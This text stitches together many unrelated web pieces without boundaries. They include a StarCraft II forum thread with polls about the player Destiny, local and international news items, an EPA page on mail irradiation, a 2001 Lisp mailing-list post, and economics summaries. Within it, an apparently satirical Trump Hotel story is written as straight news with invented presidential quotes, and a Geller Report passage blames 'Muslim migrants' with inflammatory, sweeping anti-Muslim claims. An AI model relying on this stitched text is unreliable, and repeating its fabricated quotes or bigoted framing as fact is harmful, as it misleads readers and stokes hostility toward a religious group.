2309 total votes ( 521 ) 23 % ( 517 ) 22 % ( 364 ) 16 % ( 240 ) 10 % ( 217 ) 9 % ( 191 ) 8 % ( 111 ) 5 % ( 84 ) 4 % ( 34 ) 1 % ( 30 ) 1 % 2309 total votes Your vote : 1 . On a scale of 1-10 where would you rank Destiny 's skill . ( Vote ) : 1
( Vote ) : 2
( Vote ) : 3
( Vote ) : 4
( Vote ) : 5
( Vote ) : 6
( Vote ) : 7
( Vote ) : 8
( Vote ) : 9
( Vote ) : 10
Poll : Do you think Destiny deserves to be put on known sc2 team ?
Yes ( 1212 )
60 %
No ( 798 )
40 %
2010 total votes ( 1212 ) 60 % ( 798 ) 40 % 2010 total votes Your vote : Do you think Destiny deserves to be put on known sc2 team ? ( Vote ) : Yes
( Vote ) : No
Poll : For whom would you like to see Destiny play ?
Sixjax ( 344 )
26 %
RGN/Reign ( 338 )
25 %
Evil Geniuses ( EG ) ( 216 )
16 %
Liquid'TLAF ( 116 )
9 %
SlayerS ( 94 )
7 %
Complexity ( 86 )
6 %
FXO ( 62 )
5 %
Incredible Miracles ( IM ) ( 33 )
2 %
Mouz ( 26 )
2 %
Startales ( ST ) ( 16 )
1 %
1331 total votes ( 344 ) 26 % ( 338 ) 25 % ( 216 ) 16 % ( 116 ) 9 % ( 94 ) 7 % ( 86 ) 6 % ( 62 ) 5 % ( 33 ) 2 % ( 26 ) 2 % ( 16 ) 1 % 1331 total votes Your vote : For whom would you like to see Destiny play ? ( Vote ) : Liquid'TLAF
( Vote ) : Evil Geniuses ( EG )
( Vote ) : RGN/Reign
( Vote ) : FXO
( Vote ) : Complexity
( Vote ) : SlayerS
( Vote ) : Incredible Miracles ( IM )
( Vote ) : Startales ( ST )
( Vote ) : Sixjax
( Vote ) : Mouz
My personal opinion :
+ Show Spoiler +
I think that many teams should take a hard look at Destiny . I think that occasionally what draws people to his stream is his rivalries with CombatEX ( although granted really not much of a rivalry anymore , Destiny has been winning much higher percentages against this player ) , which inevitably include BM and inappropriate beliefs/language . While I have not personally been offended at all , I can see how others may be . Beating ST_Ace was good , I think it showed Destiny 's ZvP strengths . Beating ST_Bomber in huge long games after incurring massive damage in the early game and despite intense continued drops by bomber is impressive . It showed huge ZvT potential if nothing else . Bomber beat MVP for Code A champion , has beaten MC in his time in code S , reached ro8 in code S by beating Polt the GSL Super Tournament winner , etc. ) . I think it is fair though to say that a few wins are not as significant as continued victories . To this end though I sense a bit of hypocrisy from some members of SOTG and SC2 community members . Sixjax_Artosis won 1 series out of 10 in the NASL , over the WC3 beast Grubby granted , but 10 % victory in a major tournament is not very good ... EG.Incontrol rocked out in MLG Dallas forever ago losing only to kiwikaki in the 3/4th place match . He was seeded 4th at MLG Columbus however and he only came 22nd . He has also lost to Destiny in a very recent showmatch series . Liquid_Tyler has not exactly raced through any tournaments nor has JP recently . I hate to single out this one program but it does receive roughly 10k viewers every stream and does not exactly profess a liking of Destiny , although they have to be fair openly noted that they are not purposefully or maliciously saying negative things about Destiny . I think that Destiny has shown enormous potential and I think image issues regarding language filters could be mitigated if he was spoken to by any team in question . I think that FXO , Sixjax , Vile , or Vvv , if they could get over their differences would be good fits for Destiny , and in the future I would like to see him progress to the winningest teams such as Liquid , Mouz , EG , or a Korean team . His innovation I think has been huge , he has played an integral role in redefining the ZvP matchup as a whole and the Z 's role in harassing in ZvX with his 4-Infestor drops . Even personally I have seen Liquid Ret do a two-base +1 +1 ling several infestor timing attack against a toss on ladder during his streaming craze recently . All I 'm saying is that he is better than a lot of players that are on big teams presently . As to the BM , I think that while it is more extreme from Destiny , HuK was very BM before Liquid 's acquisition and still is prone to the `` Sup Son '' and `` cool story bro '' to opponents when they make errors on the Korean Ladder .
Any other comments regarding the value of the player formerly known as ROOT_Destiny to Starcraft , as a player , professional or amateur , as well as solely a community member , are welcome . There has been much controversy over this player since the beta so let 's tell him , the community , and the other players/coaches what we think on the subject !
Please be informed and polite however , use supporting evidence , do not make baseless assertions or I will have to just hope you get banned or warned
Addition ( Read me )
+ Show Spoiler +
Howdy , after a little while it 's clear that there is a little big of degeneration into specifically whether Destiny belongs on EG . This is not the case . Please do not bash the players on any teams , EG or otherwise . Each team decides who to put on their team by their own metric , and thus each player ( contingent upon themselves and the owner 's opinions only ) belong on the teams on which they are . The thread was meant to discuss whether or not you believe if
1 . Destiny belongs on a team or not .
2 . If so , which team , and why ?
3 . Destiny 's overall skill .
4 . Destiny 's place in sc2 .
Of course I am not presuming to tell Destiny what he should or should not do , neither should any of you be so bold .Just take it as it was meant to be - some afternoon discourse , chew it over , comment if you want , and be more civil .
Obliged .
Of note , my original PM to EGalex also included a clause about whether or not Destiny would be a good pickup for Evil Geniuses , hence the seemingly non-sequitor answer.So I think that it is a fair assessment that Destiny has not gotten wildly impressive large tournament results ( MLG , etc . ) but I was wondering if people agreed that the GSPA is a mid-tier tournament , or if the wins over ST_Bomber and ST_Ace were not indicative of ability . ( if you have more please respond and they will be added to the OP ) :2-0 Victory over ST_Bomber one of the top Terran players in the world.Memorable point : this series included an almost hour long massive macro game on shakuras plateau.2-0 Victory over ST_Ace , a high level korean protoss.Memorable point : this series included a hidden spire muta build , demonstrating a different style from a player frequently thought of as ‘ one dimentional ' for his infestor play.Addition : Destiny Beat NEXpuzzle 4-1 ( thank you to pikachu856 for reminding me ) 3-2 Victory over FnaticMSI.Rain.Memorable point : Was a showmatch for $ 100 dollars , part of the ‘ Destiny v. Korea ' series on stim.tv4-3 Victory over EG.IncontrolMemorable point : Infestor play dominated the series , only one game ( on shakuras plateau ) included significant muta play . This potentially playes into the idea of a ‘ one dimensional ' style from Destiny ? Also of note , Incontrol was criticized by some for his cannon rush on shakuras leading to a cancelled natural , and his huge blink stalker all-in ( as defined by the lack of an expansion behind the attack ) on metalopolis.He is also ranked in Grandmaster League in North America as well as Upper Master League in Korea . ( again if you have more please post and I will add to the OP ) 2-0 Loss to mid-to-upper-tier Sixjax_Vibe in the GSPA2-3 Loss to EG.HuK ( Then Liquid'HuK ) `` Pikachu and Protoss are both yellow , Coincidence ? '' ~apexMorroW
Fireworks will be allowed in Cedar Rapids for an extended period inside city limits this Fourth of July holiday .
The Cedar Rapids City Council approved a new law during a special meeting Friday allowing private use of fireworks during the days around the Fourth of July and New Year 's . The new ordinance passed 5-2 .
The change coincides with a new state law approved this year allowing the sale of fireworks in Iowa around the same two holidays . That law still allows local governments to ban the use of fireworks but several cities that had bans have now lifted them to match state law .
The city code previously banned all use of fireworks inside city limits and the Cedar Rapids fire chief opposed changing that , even with the new state law , citing safety concerns .
Cedar Rapids Mayor Ron Corbett recommended the city follow state rules , at least through this first holiday period , because there was no time to draft a more restrictive rule .
Council member Scott Olson , who was an eventual `` no '' vote proposed allowing fireworks but on a more restrictive time schedule . Olson wanted fireworks use allowed only on July 3rd & 4th and December 31st and January 1st .
The action by the city council means the use of retail fireworks by anyone will be allowed from June 1st through July 8th and December 10th through January 3rd . The state law does restrict hours of use on certain days .
At least two potential fireworks vendors also attended the special council meeting .
Paul Myers , a display coordinator for J & M Displays of Burlington , has arranged the Freedom Fest fireworks display since 2001 .
Myers says he is considering setting up a retail operation in the Cedar Rapids area but will have to see what the permitting process involves . The state fire marshal was directed by the new state law to come up with a permit . But vendors at the council meeting says that has n't happened yet .
Corbett believes the council will study the issue after the 4th and may come up with tighter rules before the January 1st use period .
A central Georgia school system has `` taken measures to correct the situation '' after a veteran teacher was recently accused of making controversial classroom comments about the president , including allegedly questioning his religion .
The teacher allegedly stated that President Barack Obama is not a Christian and that any parent who supports Obama is not a Christian either .
`` Giving political opinions in the classroom is not OK , and we do n't condone that , and we have taken measures to make sure it does n't happen again , '' Dublin City Schools Superintendent Chuck Ledbetter said .
Ledbetter said a parent at Dublin Middle School first brought the matter to the school principal after the comments were allegedly made in late February ; the matter was then brought to his attention , he said , and again presented to the larger school board at a meeting on March 23 .
In a letter to the Courier Herald following that meeting , the local chapter of the NAACP called on the board to investigate .
By that point , Ledbetter said an investigation and corrective steps were already in motion , but that he appreciated the parent 's desire to present to the board .
In its letter the NAACP also alleges that , in a parent-teacher conference soon after the comments were made , the teacher `` presented to the parents a packet of several pages from a website that expressed her views on religion and politics '' instead of adequately addressing their concerns . The teacher also brought her husband , who is a school board member , to that meeting , the NAACP alleges .
Ledbetter said that personnel actions are private and declined to give the teacher 's name or outline the specific measures taken . He said that he asked the parent specifically and was told the incident was isolated .
The teacher was identified by WMGT , an NBC affiliate in Macon , as Nancy Perry , who told the station `` what has been reported is 'untrue ' and she calls this an `` unfortunate issue . ' '' Perry 's name was first reported by blogger Alan Wood .
`` This is the first time we 've had this take place , so we 're trying to make sure we correct it with that teacher , '' Ledbetter said .
He said a letter has been sent to the family , outlining the measures taken , and that he will speak with them today .
He said the board tries to be transparent in its conduct and that it wants to clearly communicate that speech like this has no place in the classroom .
`` Political opinions build walls , not bridges , '' Ledbetter said .
The Color is the only resource in the game : it acts as the health , inventory , skills and perks system , armory .
All in-game actions are realized through drawing . You literally need to draw your way with your own blood .
Each Color can cause both harm and good . A player gets various advantages from getting any of The Colors , but when he draws with it he feeds the enemy forces of the world .
Fight with golems , bloodthirsty predators , and other spawns of The Void .
When one gives up living and using his soul , he ca n't only lose the soul but can also devote it to death…Before souls completely die they stick in The Void – an odd space between life and death . There is an outside chance to survive in The Void and even to come back from it . This chance is The Color – the only food of a dying soul wandering through the mournful realms of The Void , governed by monstrous Brothers and malicious Sisters , who are desperately struggling for the last drops of it . The Color is not only the sense of life of these mysterious creatures but also gives power and vital force to the whole Void . The Color gives you power to do almost everything even to get out of Death 's clutches if you gain enough ! There is a great lack of Color in the arid deserts of The Void . There is Color only for one . Be the one , get your lost soul back !
© Ice Pick Lodge , 2009 . All rights reserved . © ND Games , 2009 . All rights reserved . ND Games is a part of Noviy Disk Company . www.ndgames.ru
HOUSTON — Donald Trump and First Lady Melania visited Houston to witness firsthand the devastation Hurricane Harvey inflicted on the fourth most populated city in the United States .
Officials close to the President noted that he appeared visibly disturbed about the disaster , which had befallen Houston . However , his reasons for seeming to be so personally affected were later to be found out to be nothing remotely resembling empathy .
Trump had intended to begin building a new Trump Hotel in Houston in 2018 , but the flooding will push the construction date back for the foreseeable future .
“ What 's happened in Houston is very sad . A lot of good people there . Many nice things in Houston . Great steak , too , ” said Trump . “ A lot of business there . I think the saddest thing about Harvey is the fact that the city will have to wait probably at least one more year before they get a Trump Hotel . ”
While his concern about his personal ventures has upset many , his Houston Trump Hotel comments immediately provided fodder to those who say the President lacks decency and compassion . He later tweeted that he meant it was sad that Trump Hotel was not already built in Houston because he would have opened the doors , and allowed evacuees to take refuge in his property .
Scott Halleran via Getty Images An eight-person jury ruled in favor of Derrick Rose , Ryan Allen and Randall Hampton on Wednesday in a civil trial over whether the three men raped their unnamed accuser in August 2013 .
A federal jury in Los Angeles ruled Wednesday in favor of Derrick Rose and co-defendants Ryan Allen and Randall Hampton over allegations they raped one of the New York Knicks guard 's former partners in the summer of 2013 . The eight-member jury , which reportedly took less than four hours to reach its decision , cleared the three men of all charges related to the $ 21 million lawsuit . In a statement provided to the Associated Press , Rose said he was “ thankful that the jury understood and agreed with me. ” “ This experience and my sensitivity to it was deep . I am ready to put this behind me and focus on my family and career , ” he added .
Do n't see this every day . @ drose and atty posing with giddy jurors after verdict . # DoevRose pic.twitter.com/hbmxnPnyf6 — Joel Rubin ( @ joelrubin ) October 19 , 2016
The decision concludes the two-week civil court trial against Rose and his co-defendants , in which the accuser alleged that the three friends gang-raped her while she was intoxicated on the night of Aug. 27 , 2013 . The defense did not dispute that the three men had sex with the accuser that night , instead arguing that the woman was cognizant at the time and that the sex was consensual . The accuser 's team faced an uphill battle in the case , as the jury was told merely determining the accuser had been intoxicated at the time of the incident was not enough to prove she could n't consent to sex . Rather , as sports law attorney Daniel Wallach explained in a series of tweets , the jury had to determine whether she was so intoxicated that she could not provide consent . The jury also was allowed to consider any prior sexual activity that they determined to be relevant .
The UK banned me from entering the country because of my support for Israel and my opposition to jihad . But this horror is sanctioned and censored . The UK was once considered the most civilized nation in the world , the land of the Magna Carta ; it is devolving into an oppressive , brutal Islamic state .
Muslim youth gangs moved into London 's largest Jewish community with knives , baseball bats , and machetes to beat and terrorize innocent Jews in their own neighborhood .
“ Geller : The Nation That Gave the World the Magna Carta Is Dead ”
This member of the LGBT community reports what she saw :
London 's largest Jewish community terrorised by Muslims armed with machetes and bats
by SB on June 24 , 2017 ( here )
While the media highlight the Muslim communities fear of hate crimes and retribution after Islamic terror attacks and the Finsbury attack by a drunk and suicidal “ white male , ” for two nights in a row London 's largest Jewish community has been terrorised by Muslims armed with bats and machetes . While the media highlight the Muslim communities fear of hate crimes and retribution after Islamic terror attacks and the Finsbury attack by a drunk , mentally ill and suicidal “ white male , ” for two nights in a row London 's largest Jewish community has been terrorised by Muslims armed with bats and machetes .
Britain 's new normal . For the second night in a row Muslim youth gangs moved into London 's largest Jewish community with knives , baseball bats , and machetes to beat and terrorize innocent Jews in their own neighborhood . …At least one person was stabbed during a mass brawl in Stamford Hill in which dozens of violent youths clashed using bats , knives and even machetes following an illegal rave , according to reports from The European Union Times . Riot police were dispatched… Social media reports from the scene indicated that around 30 young people brandishing an assortment of weapons , ranging from knives to bats , fought each other and vandalized vehicles in the neighborhood . …violence…has erupted for a second night in a row…At least one person was injured in the clashes . …Police eventually dispersed the crowd and reportedly seized a large cache of weapons in the surrounding streets of the district . The area is home to the largest Jewish community in the British capital . The majority of the youth aggressors were Muslim migrants but the political correct British press either calls them “ youths ” or “ Asian ” or does n't mention them at all . Some of the youths were heard shouting “ Allahu Akbar ” by a few witnesses at the scene -powderedwigsociety.com
JIHADI SICKOS Depraved ISIS supporters call for attacks on British synagogues and kosher stores as they warn Israel 's ‘ girls will become slaves '
The Sun , July 19 , 2017 :
SICK ISIS supporters have called on jihadis to attack British synagogues and kosher shops in an anti-Semitic online screed . Depraved extremists are urging fanatics to target London 's Jews at the places of worship on as they observe the Sabbath . 3 One sick post even displayed a blood spattered Israeli flag Research carried out by Washington based think tank the Middle East Media Research Institute ( MEMRI ) , uncovered the disturbing posts which even claimed Israeli girls would become “ slaves ” . The hate filled screed calls for the “ Apes ” to be prevented from “ attending their places of disbelief ” followed by the hashtags # synagogues , # schools and # shops . There was then a link Wikipedia list of British synagogues . The links were posted on the online messaging system Telegram . The pro-ISIS channel posted a screenshot from the website of the West London Synagogue . 3 The depraved messages are filled with anti-Semitic language as they call on fighters to attack Jewish worshippers The caption reads : “ ‘ What are you doing this weekend ? ' Hint * how about the zoo and check some monkeys out . # Synagogues # Gatecrash # Events # zoo. ” Further on in the conversation a blood spattered Israeli flag was posted along with a poem reading : “ The sun will shine red between Gaza and Rafa . “ The moon will blacken over the peak at Mt . Hermon . “ Flowers are dead and girls become slaves . “ Loads of soldiers will return to town as corpses. ” There then followed a list of Jewish shops and delis all around the country in London , Birmingham , Gateshead , Bristol , Edinburgh and Glasgow . In the online rant they claim any attack , which they had called for last weekend , would have been in response to the killing a trio of terrorists by Israeli police . Two border policemen were gunned down by three Arab-Israeli attackers before security forces killed them near Jerusalem 's holiest site on Friday . Israeli authorities shut the area after the attacks – the most serious incident in years close to the highly sensitive compound , which is holy to both Muslims and Jews . 3 Sick ISIS messages calling for attacks on British synagogues have been spread online The area was close to the highly sensitive compound known to Jews as the Temple Mount and to Muslims as the Noble Sanctuary . The closure stopped Muslims gathering there for Friday prayers , drawing a call for resistance from Palestinian leaders . The gunmen arrived at the sacred site about 7 a.m. local time Friday and walked toward one of the Old City gates nearby , police spokeswoman Luba Simri told Reuters . “ When they saw policemen they shot towards them and then escaped towards one of the mosques in the Temple Mount compound , ” Simri said . “ A chase ensued and the three terrorists were killed by police. ” The dead officers were identified as Advanced Staff Sgt . Maj. Haiel Sathawi , 30 , and Advanced Staff Sgt . Maj. Kamil Shnaan , 22 , the son of former Israeli parliament member Shakib Shnaan .
The Truth Must be Told Your contribution supports independent journalism Please take a moment to consider this . Now , more than ever , people are reading Geller Report for news they wo n't get anywhere else . But advertising revenues have all but disappeared . Google Adsense is the online advertising monopoly and they have banned us . Social media giants like Facebook and Twitter have blocked and shadow-banned our accounts . But we wo n't put up a paywall . Because never has the free world needed independent journalism more . Everyone who reads our reporting knows the Geller Report covers the news the media wo n't . We can not do our ground-breaking report without your support . We must continue to report on the global jihad and the left 's war on freedom . Our readers ' contributions make that possible . Geller Report 's independent , investigative journalism takes a lot of time , money and hard work to produce . But we do it because we believe our work is critical in the fight for freedom and because it is your fight , too . Please contribute to our ground-breaking work here .
Make a monthly commitment to support The Geller Report – choose the option that suits you best . Contribute Monthly - Choose One Subscriber : $ 18.00 USD - monthly Contributor : $ 36.00 USD - monthly Patron : $ 50.00 USD - monthly Silver member : $ 100.00 USD - monthly Gold member : $ 250.00 USD - monthly Platinum member : $ 500.00 USD - monthly
The Force Awakens actor and professional parkour athlete Pip Andersen spoke with Red Carpet News TV and revealed some new details about his character in The Force Awakens .
It was rumored before that Anderesen will have a very brief appearance in the movie , but now the actor himself revealed that he spent significant time on set with Daisy Ridley and John Boyega . He also worked together with Harrison Ford and briefly touched on the movie 's pace , and of course the practical effects . : )
Andersen also discussed what it was like wearing his Star Wars costume . As you probably remember Pip did some mo-cap work at the Imaginarium back in October , but it was unclear if it was for TFA ( HERE ) . From Pip 's words it appears that he will be wearing a regular costume since he did some fittings at Pinewood .
Transcript via Cantina member MagnarTheGreat :
Q : And of course it 's a special cast with new faces alongside some very familiar older faces . Did you get a chance on set to meet any of the well-known heroes of the franchise ? PA : Well Harrison [ Ford ] was probably the only one that I worked with on set as well as kind of talked to more . I did n't get the chance to meet Mark [ Hamill ] at all which was a bit of a shame , but I did get to see almost all the other main characters do their thing so it was good fun . PA : It felt very much like school almost , like we were kind of kidding with each other all the time . So me , Daisy , and John all kind of were around each other much more than I was with the more experienced guys . Yeah , it was good fun . It was really good . And Daisy and John both [ are ] absolutely lovely people .
Pip Andersen 's showreel :
So with Daisy Ridley 's gymnastic abilities and bojutsu , plus Pip Andersen 's and Christina Chong 's parkour skills , we can expect some really impressive action sequences in the movie .
Residents in southwestern Japan became increasingly concerned on Thursday as the country 's Shinmoedake volcano continued to erupt .
Shinmoedake on Kirishimayama at the prefectural border of Kagoshima and Miyazaki erupted on Wednesday for the first time in about six years .
According to Japanese broadcaster TBS , the plume rose to the height of 1,700 metres from the crater and ash fall was confirmed in the four cities and towns in Miyazaki prefecture with Thursday 's eruption .
TBS showed footage of elementary school students wearing helmets and masks on their way to school at the foot of Shinmoedake .
On Wednesday morning , the Japan Meteorological Agency raised the eruption warning level from 2 to 3 on a scale of 5 . The agency is warning of big eruptions and pyroclastic flow in the range of 2 kilometres from the crater .
Mail Irradiation
Explore the interactive , virtual community of RadTown USA !
Irradiated mail is passed through a high-energy beam of electrons or x-rays .
Irradiation sterilizes mail ; it does not make mail radioactive .
Mail irradiation can damage many plastics and make paper brittle .
On this page :
About Mail Irradiation
In October 2001 , deadly anthrax was found in mail sent to various news agencies and to the offices of two U.S . Senators . As a precaution , the U.S . Postal Service , with help from the Federal Bureau of Investigation and public health experts , began to irradiate mail .
The irradiation process passes mail through a high-energy beam of electrons or x-rays . It delivers a radiation dose that is approximately 2 million times stronger than a chest x-ray . The beam penetrates deep into the mail to destroy bacteria and viruses . It can even penetrate letter trays and packages .
The radiation has so much energy that it causes chemical changes in the paper . The mail comes out brittle and discolored . It looks like it has been baked in an oven and may have an odd smell . The large amounts of high energy used in irradiation will turn plastics brown and warp the cases of computer discs ( See the image at right ) . However , irradiating mail does not make it radioactive .
Radiation levels are closely monitored at mail irradiation facilities to ensure that workers are safe . The facilities have very thick concrete or lead-lined walls shielding the exposure rooms . This ensures that employees and visitors are protected from harmful radiation .
Remember Irradiation does not make mail radioactive .
Top of page
Rules and Guidance
U.S . Postal Service ( USPS )
USPS employs contractors who irradiate mail that is sent to some government agencies . Irradiating mail ensures that those receiving the mail will not be exposed to harmful biological materials such as anthrax .
U.S. Department of Health and Human Services ( HHS ) , U.S. Centers for Disease Control and Prevention ( CDC )
CDC 's National Institute for Occupational Safety and Health ( NIOSH ) conducted three health hazard evaluations on the handling of irradiated mail in response to health complaints from some individuals who handled it .
U.S. Department of Health and Human Services ( HHS ) , U.S. Food and Drug Administration ( FDA )
FDA protects public health and safety by setting rules for the manufacturing of products that emit radiation . These include equipment for mail irradiation .
U.S. Environmental Protection Agency ( EPA )
Federal and state agencies use EPA 's federal guidance to develop rules and regulations that protect radiation workers and the general public from unnecessary exposure to radiation . These rules are used to protect radiation workers from harmful effects during the irradiation process .
Top of page
What you can do
There are no radiation concerns with handling irradiated mail . Irradiation does not make the mail radioactive . It simply exposes the mail to high-energy beams that kill any bacteria .
Top of page
Where to learn more
Handling Irradiated Mail
Centers for Disease Control and Prevention , Workplace Safety and Health Topics
This webpage provides information about the health hazard evaluations performed by CDC in response to complaints from individuals handling irradiated mail .
Top of page
Topical science series . Six months after the explosions at the Fukushima nuclear plant in Japan , Professor Jim Al-Khalili sets out to discover whether nuclear power is safe .
Six months after the explosions at the Fukushima nuclear plant and the release of radiation there , Professor Jim Al-Khalili sets out to discover whether nuclear power is safe .
He begins in Japan , where he meets some of the tens of thousands of people who have been evacuated from the exclusion zone . He travels to an abandoned village just outside the zone to witness a nuclear clean-up operation .
Jim draws on the latest scientific findings from Japan and from the previous explosion at Chernobyl to understand how dangerous the release of radiation is likely to be and what that means for our trust in nuclear power .
Re : `` Python for Lisp Programmers ''
To : Paul Prescod < address @ hidden >
Subject : Re : `` Python for Lisp Programmers ''
From : Scott McKay < address @ hidden >
Date : Thu , 06 Dec 2001 16:12:27 -0500
Cc : Scott McKay < address @ hidden > , address @ hidden
In-reply-to : < 3C0FD684.63B474B6 @ prescod.net >
References : < 5.0.2.1.0.20011206140913.00a26ec0 @ pop.hotdispatch.com >
Sender : address @ hidden
At 03:35 PM 12/6/01 , Paul Prescod wrote : > Scott McKay wrote : > > > > ... > > > > Peter draws a pretty good 1-to-1 ( and `` onto '' ) mapping from CL > > to Python , which makes me wonder how Lisp can be heavy > > ( which I think it is ) and Python can be light ( which I have not > > decided about ) . > > What about things like the CLOS MOP , generic functions , optional type > annotations and macros ? Do n't worry , van Rossum seems smart . I 'll bet that generic functions , type annotations , and macros will appear in Python sometime . : - ) Please note that most of the CLOS MOP is * not * part of Common Lisp , even though most CL implementations support most of it . FWIW , I think that generic functions make a language lighter than having class-based OO . And * optional * type declarations that are well-integrated into the language do n't really add any weight , because you do n't have to use them . Finally , in my experience , macros are the key to making domain-specific libraries light , since they can so radically simplify APIs . > Also , part of what makes Python lightweight is the libraries . There are > built-in libraries ( standardized across implementations and platforms ) > for doing the sort of hacking that most programmers need to do today : > file manipulation , sockets , HTTP , HTML and XML . A distribution of Common > Lisp might be lighweight if it supported the same stuff , but CL the > standard predates many of the technologies that programmers need to work > with . Presumably you mean `` Python itself is light because its weighty bits are distributed in libraries '' , right ? If so , I need to point out that there are CL libraries for sockets , HTTP , HTML , and XML as well . And it 's easy to conceive of a language -- let 's call it CL -- -- which is exactly like CL except that chunks of its functionality are simply moved , otherwise unchanged , to libraries . Would CL -- be light-weight after doing this sleight-of-hand ? > If we agreed that Python were heavy , then what of Perl ? And what is > left , just Scheme ? Perl is about as light-weight as a brontosaurus , but that 's just my opinion based on my `` small , reasonably orthogonal core '' , which Perl lacks in spades . Scheme is undeniably light-weight . BTW , I 'm not trying to * prove * that CL is light-weight , because I think that it is not . What I am trying to winkle out is , why do some people think that Python * is * light-weight , when Python is sooooo close to CL in so many ways ? I 'm picking these two languages precisely because they are so similar , yet the perception of them is so different .
According to David Schneider and Adam Reich it does , their paper is called Marrying Ai n't Hard When You Got A Union Card ? Labor Union Membership and First Marriage . The abstract is this :
Over the past five decades , marriage has changed dramatically , as young people began marrying later or never getting married at all . Scholars have shown how this decline is less a result of changing cultural definitions of marriage , and more a result of men 's changing access to social and economic prerequisites for marriage . Specifically , men 's current economic standing and men 's future economic security have been shown to affect their marriageability . Traditionally , labor unions provided economic standing and security to male workers . Yet during the same period that marriage has declined among young people , membership in labor unions has declined precipitously , particularly for men . In this article , we examine the relationship between union membership and first marriage and discuss the possible mechanisms by which union membership might lead to first marriage . We draw on longitudinal data from the National Longitudinal Survey of Youth-79 to estimate discrete time event-history models of first marriage entry and find that , controlling for many factors , union membership is positively and significantly associated with marriage . We show then that this relationship is largely explained by the increased income , regularity and stability of employment , and fringe benefits that come with union membership .
That is via the excellent Kevin Lewis , who cites some other interesting papers at the link .
The UK 's poorest families are facing the tightest income squeeze of any group due to higher rates of inflation and lower wage boosts , according to new analysis of official figures conducted by the Trades Union Conference ( TUC ) .
The bottom 10 % of the country by income are facing effective inflation rates of 4.1 % versus just 3.3 % for the richest , while official Office for National Statistics ( ONS ) statistics from 2011 show the wages of the bottom 10 % of earners rose just 0.7 % compared with increases of 1.6 % for the richest .
Taken together , the two measures suggest real wages for low-income families in Britain are falling twice as fast as those of their richer counterparts . In real terms , the bottom 10 % of wage earners are 3.4 % poorer than they were a year before versus a 1.7 % drop for the top 10 % year-on-year .
The analysis also suggested real wages had fallen for every income group every month since the coalition came to power in May 2010 , with the lowest earners frequently taking the biggest hit .
The figures come as a further blow to the coalition 's `` all in it together '' message after a rocky relaunch through the government 's second Queen 's speech this week , as the TUC used the data to call for further action to support families .
`` People have been getting poorer every month for the last two years as high inflation , tax rises and the dire state of the economy take their toll on family budgets , '' said the outgoing general secretary , Brendan Barber .
`` Over the last year the poorest households have suffered more than anyone else from rising food prices and soaring gas and electricity bills . The chancellor 's obsession with raising VAT , along with swingeing cuts to tax credits , has made life even tougher for those on low to medium incomes .
`` The government must start taking our living standards crisis seriously and put jobs and decent pay rises at the heart of its economic strategy . Dressing up plans to make it easier for businesses to sack people for no reason as some kind of pro-growth agenda will not help our economy one bit . ''
Low-income families have typically faced lower inflation than the UK as a whole over the past few years thanks to smaller price rises in food and utility bills versus other rising costs .
The UK 's official measure of inflation , the CPI , stands at 3.5 % and is calculated by measuring changes in prices of thousands of items from different categories : food , utility bills , recreation and more .
New research by the TUC has re-calculated this figure from 2010 to February 2012 using data showing how each group spends its money . Families in the bottom 10 % spend a much higher proportion of their income on food and household costs such as utility bills than the richest 10 % , and owing to lower levels of spending do not benefit nearly so much from smaller increases in recreation , clothing , restaurants and other leisure activities caused by the stagnant economy .
According to the ONS figures , food is 4.6 % more expensive than a year ago , alcohol and tobacco 8 % pricier , and housing and utilities up 6.2 % . Only recreation and culture is cheaper than a year ago , with a small 0.6 % decrease .
The TUC figures come before new official data on inflation and wages , due to be published next week . The figures will be the first to show the effects of some of the measures announced in George Osborne 's March budget , such as increases on alcohol and cigarette duty , which the TUC predicts will affect inflation for low-income families to a greater extent than their wealthier counterparts .
The now-notorious `` pasty tax '' – which would make hot baked goods sold in supermarkets and bakeries subject to VAT – takes effect in October 2012 .
FILE PHOTO : A NASA image shows the International Space Station as it flew over Madagascar , showing three of the five spacecraft docked to the station in this photo taken by the Expedition 47 Flight Engineer Tim Peake of ESA on April 6 , 2016 and released on April 8 , 2016 . REUTERS/Tim Peake/ESA/NASA/Handout via Reuters Reuters
By Irene Klotz
CAPE CANAVERAL , Fla. ( Reuters ) - A pair of astronauts will venture outside the International Space Station on Tuesday for an emergency spacewalk to replace a failed computer , one of two that control major U.S. systems aboard the orbiting outpost , NASA said on Sunday .
The primary device failed on Saturday , leaving the $ 100 billion orbiting laboratory to depend on a backup system to route commands to its solar power system , radiators , cooling loops and other equipment .
The station 's current five-member crew from the United States , Russia and France were never in any danger , the National Aeronautics and Space Administration said in a statement .
Station commander Peggy Whitson and flight engineer Jack Fischer , both with NASA , will partner for the spacewalk , which is expected to last two hours , the U.S. space agency said .
Earlier on Sunday , Whitson assembled and tested a spare electronics box to replace the failed device , which had been installed during a spacewalk on March 30 , said NASA spokesman Dan Huot .
NASA 's last emergency spacewalk took place in December 2015 when two U.S. astronauts left the station to release the brakes on a robot arm 's mobile transporter .
The ISS , which is staffed by rotating crews of astronauts and cosmonauts , serves as a research laboratory for biology , life science , materials science and physics experiments , as well as astronomical observations and Earth remote sensing .
The station , owned and operated by 15 nations , flies about 250 miles ( 400 km ) above Earth and orbits the planet about every 90 minutes . It has been continuously staffed since 2000 .
( Editing by Jeffrey Benkoe and Sandra Maler )
This is a gentle , innocent film about the reflections of an aging man , who returns to his home town after the death of his best friend . Memories of life at age 11 floods back as it was a magical time that changed his life . Three 11 year old children ( Bobby , Carol , and Sully ) share their lives . Carol and Bobby have a special affection for one another including sharing a kiss `` by which all others will be measured '' . Bobby lives with his mother , a bitter , vain woman who looks for pleasures for herself without sharing much with her son . Into their lives comes a mysterious new boarder , who befriends the boy but generates distrust from the mother . As time passes , the man and boy share confidences and special powers are revealed . The man warns the boy to be on the lookout for the `` lowmen '' , who were seeking him . The two share a summer 's adventures and come to love one another before the inevitable happens . A confrontation with a school bully also changes everyone . Written by John Sacksteder < jsackste @ bellsouth.net >
Prospective independence is something spoken about as an opportunity for real change in Scotland , a chance to push compassion and equality through every avenue of our political system and beyond . Rightly so .
Less discussed , however , is how the promotion of these values could be used to benefit those who may not adhere to them now . Scotland already has its own prison service , but if independence is to be the impetus for a societal reshaping , this should also apply to how we treat our criminals .
The UK has the largest prison population per head in western Europe , and Scotland sees some of the highest reoffending rates . While it is true that these numbers are decreasing , those most likely to commit another crime once released were those serving sentences shorter than three months and those imprisoned for drug offences . This suggests a fundamental flaw both in how we punish smaller offences , and in the supposed ‘ war on drugs ' .
